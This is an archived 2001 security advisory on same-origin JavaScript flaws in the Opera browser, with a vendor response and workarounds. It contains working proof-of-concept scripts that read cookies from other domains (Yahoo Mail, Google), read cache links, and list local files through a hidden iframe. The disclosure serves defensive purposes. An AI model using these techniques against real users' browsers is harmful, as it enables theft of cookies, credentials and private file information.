TUCoPS :: Browsers :: win4860.htm

Opera Multiple Java Vulnerabilities

16th Nov 2001

COMMAND

	Opera web browser multiple java vulnerabilities

SYSTEMS AFFECTED
		
	Opera 5.12/Windows, Opera 5.0/Linux - probably other versions

PROBLEM

	In Georgi Guninski security advisory #51 [www.guninski.com] :
	

	

	Several javascript vulnerabilities in Opera
	

	Systems affected: Opera 5.12/Windows, Opera 5.0/Linux - probably other versions
	

	Risk: Medium Date: 15 November 2001
	

	Legal Notice: This Advisory is Copyright  (c)  2001  Georgi  Guninski.  You  may
	distribute it unmodified. You may not modify it and distribute it or  distribute
	parts of it without the author's written permission.
	

	Disclaimer: The information in this advisory is believed to  be  true  based  on
	experiments though it may be false. The opinions expressed in this advisory  and
	program are my own and  not  of  any  company.  The  usual  standard  disclaimer
	applies, especially the fact that Georgi Guninski is not liable for any  damages
	caused by direct or indirect use of the information  or  functionality  provided
	by this advisory  or  program.  Georgi  Guninski  bears  no  responsibility  for
	content or misuse of this advisory or program or any derivatives thereof.
	

	Anouncement:  I  am  looking  for  contracts  in  the  security  area  -   check
	http://www.guninski.com
	

	Description: Opera is a multiplatform web browser. There are several  javascript
	vulnerabilities in it, basically allowing script in a page to access a page  and
	its properties in another  domain  -  AFAIK  Netscape  call  this  "Same  Origin
	Vulnerability". It is possible a script in web page to access at  least  cookies
	and links in arbitrary domains  to  which  the  user  has  access.  It  is  also
	possible a script to read the the links in the user's cache  and  history  which
	at least have privacy implications if not more. In some cases cookies and  links
	in   the   cahe/history   may   containg   sensitive   information    such    as
	usernames/passwords etc.
	

	

	Details:
	

	Examine the following scripts:
	

	-1.----------------------------------
	 

	a=window.open("http://mail.yahoo.com");

	function f()

	{

	xx=a.document.cookie;

	alert("hi"+xx);

	a.document.open();

	a.document.write("<h1>aa</h1><script>x=window.open('http://mail.yahoo.com');setTimeout('z=x.document.cookie;alert(z);',5000)</"+"script>");

	a.document.close();

	}

	setTimeout("f()",5000);

	

	-----------------------------------
	

	-2.--------------------------------
	 

	a=window.open("about:cache");

	function f()

	{

	xx=a.document.links[2];

	alert("hi="+xx);

	}

	setTimeout("f()",5000);

	

	-----------------------------------
	

	In addiotion the HotJava  explot  at  http://www.guninski.com/hotjava1-desc.html
	works as Jay@InfoAve.net pointed out.
	

	Andreas Sandblad [http://www.homer.nu/security/opera/] added :
	

	One  thing  that  wasn't  mentioned  and  might  not  be  obvious  is  that  the
	vulnerability can also be used to list files on the user's  harddrive.  This  is
	because the url file://c:/ is seen as a html-page by  Opera.  Thus  we  can  use
	document.links to retrieve filenames and directories.
	

	Opera released 6.0 beta 1 for windows three days ago and it's  also  vulnerable.
	In fact it's actually much easier to write the script for it and easier to  make
	the attack invisible since Opera added better support to iframe.
	

	Opera 6.0 (not 5.x): List files and directories in c:/
	 

	<iframe id="rewrite" src="file://c:/" width=0 height=0></iframe>

	<script language="javascript">

	s="javascript:t=\\\'\\\';for(i=0;(c=document.links.item(i));i++){t+=c};alert(t);";

	setTimeout('parent.rewrite.document.location="\'+s+'\"',1);

	</script>

	

	Opera 6.0 (not 5.x): Get google cookie
	 

	<iframe id="rewrite" src="http://www.google.com/" width=0 height=0></iframe>

	<script language="javascript">

	setTimeout('parent.rewrite.document.location="javascript:alert(document.cookie)"\',8000);

	</script>

	

	

	

	

SOLUTION
		
	Workaround: Disable javascript (Opera suggest enabling  "Use  cookies  to  trace
	password protected documents")
	

	Vendor status: The vendor was notified on 5 November 2001 and was asked  whether
	a    fix    shall     be     issued     and     when.     The     reply     was:
	------------------------------------ You should be able to  resolve  the  cookie
	issue by enabling "Use cookies to trace  password  protected  documents",  which
	means that pages with password protection aren't cached, cookies aren't  stored,
	the URL shouldn't be displayed in History, etc. This  is  a  "paranoia"  option,
	and  makes  a  few  pages  unusable.  As  you  are  probably  aware,  many   web
	technologies aren't very secure, but it is inconvenient for the  user  to  block
	these. This is why the user should be given a choice to  block  privacy  related
	information. ------------------------------------

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2025 AOH